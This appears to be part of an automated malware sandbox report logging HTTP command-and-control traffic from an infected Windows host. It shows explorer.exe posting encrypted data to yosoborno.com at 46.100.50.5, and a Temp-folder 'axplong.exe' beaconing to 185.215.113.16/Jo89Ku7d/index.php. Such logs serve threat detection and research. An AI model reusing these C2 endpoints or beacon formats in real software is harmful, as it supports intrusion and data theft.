Aug 26, 2024 23:29:46.487157106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49747	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:46.288021088 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://loonlkjdmre.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: yosoborno.com
Aug 26, 2024 23:29:46.288043976 CEST	266	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 30 20 cf e6 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu0 m~pcn"RCyeV-EBT'1\|}<3a5$m5a^E\|2Nt+FoZ5Z1}ag:/s
Aug 26, 2024 23:29:47.367186069 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49750	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:46.596101999 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:47.353496075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:47.354227066 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:47.607012033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49753	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:47.376224995 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rdpalbeqriyet.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: yosoborno.com
Aug 26, 2024 23:29:47.376300097 CEST	117	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3a 5c b3 8f Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu:\{n}wua'A%8rq
Aug 26, 2024 23:29:48.456402063 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49754	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:47.722033978 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:48.462184906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:48.464540958 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:48.716784954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49755	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:48.473599911 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pxqpkqxbcagfr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: yosoborno.com
Aug 26, 2024 23:29:48.473676920 CEST	228	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 20 1b fc 95 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu N@OLv:_rh{eT^f+K)+TVWWd:-CgY#`5@vxH3'WM`i=q
Aug 26, 2024 23:29:49.558115005 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49756	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:48.898370981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:49.649106026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:49.650511026 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:49.899471045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49758	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:49.567632914 CEST	274	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dwegqlgvtfhv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: yosoborno.com
Aug 26, 2024 23:29:49.567840099 CEST	367	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 65 52 db 92 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vueRZQpw=%owdMIT4S CJ\|u/_fyQV^5yV(\|h@GT=FcDpz<GJP\|Y]
Aug 26, 2024 23:29:50.621480942 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49759	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:50.070094109 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:50.830305099 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:50.831723928 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:51.327591896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 26, 2024 23:29:51.328958988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49760	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:50.631639004 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vohbymlahmj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: yosoborno.com
Aug 26, 2024 23:29:50.631655931 CEST	121	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3e 42 df 8f Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu>B[ ~mvd)(2m<ND2
Aug 26, 2024 23:29:51.752167940 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:51 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49761	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:51.511388063 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:29:52.472436905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:52.473134995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:29:52.475601912 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:29:52.722932100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49762	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:51.761698961 CEST	274	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rvrecysevqfd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: yosoborno.com
Aug 26, 2024 23:29:51.761724949 CEST	120	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 41 3b ed a0 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vuA;INiu9MM)0h]}Z#
Aug 26, 2024 23:29:52.972009897 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:29:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 